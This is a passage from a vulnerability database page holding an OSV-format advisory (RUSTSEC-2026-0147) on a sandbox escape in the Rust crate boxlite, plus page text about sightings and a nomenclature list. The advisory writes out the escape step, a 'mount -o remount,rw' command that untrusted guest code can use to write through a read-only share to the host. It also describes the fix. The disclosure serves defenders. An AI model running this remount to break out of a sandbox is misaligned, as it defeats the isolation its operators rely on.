      "ecosystem_specific": {
        "affected_functions": null,
        "affects": {
          "arch": [],
          "functions": [],
          "os": []
        }
      },
      "package": {
        "ecosystem": "crates.io",
        "name": "boxlite",
        "purl": "pkg:cargo/boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0-0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "versions": []
    }
  ],
  "aliases": [
    "CVE-2026-46695",
    "GHSA-g6ww-w5j2-r7x3"
  ],
  "database_specific": {
    "license": "CC0-1.0"
  },
  "details": "Affected versions of `boxlite` mount host directories shared via virtiofs\nas guest-side read-only by setting `MS_RDONLY` from the guest. Because the\ndefault guest capability set included `CAP_SYS_ADMIN`, untrusted code\nrunning inside a sandbox could execute `mount -o remount,rw \u003cpath\u003e` to\nre-flag the share as read-write and then write through to the host\nfilesystem \u2014 fully escaping the read-only contract `boxlite` advertised\nto callers.\n\nThe fix in v0.9.0 enforces read-only at the hypervisor level via\n`krun_add_virtiofs3` (so the guest\u0027s `MS_RDONLY` is no longer the\nauthoritative gate) and drops `CAP_SYS_ADMIN` from the default guest\ncapability set (matching Docker\u0027s defaults).\n\nThis is a sandbox-escape bug: `boxlite` is a sandboxing runtime, so the\nread-only invariant is part of its security contract. CVSS rated 10.0 by\nthe upstream advisory.",
  "id": "RUSTSEC-2026-0147",
  "modified": "2026-05-20T09:41:31Z",
  "published": "2026-05-16T12:00:00Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://crates.io/crates/boxlite"
    },
    {
      "type": "ADVISORY",
      "url": "https://rustsec.org/advisories/RUSTSEC-2026-0147.html"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-g6ww-w5j2-r7x3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/boxlite-ai/boxlite/pull/454"
    }
  ],
  "related": [],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Read-only volume remount bypass via guest CAP_SYS_ADMIN"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-G6WW-W5J2-R7X3

Summary

Details

PoC

Impact

Score

Credit

Note

Resolution

rustsec-2026-0147

Vulnerability from osv_rustsec

Tags

Sightings

Nomenclature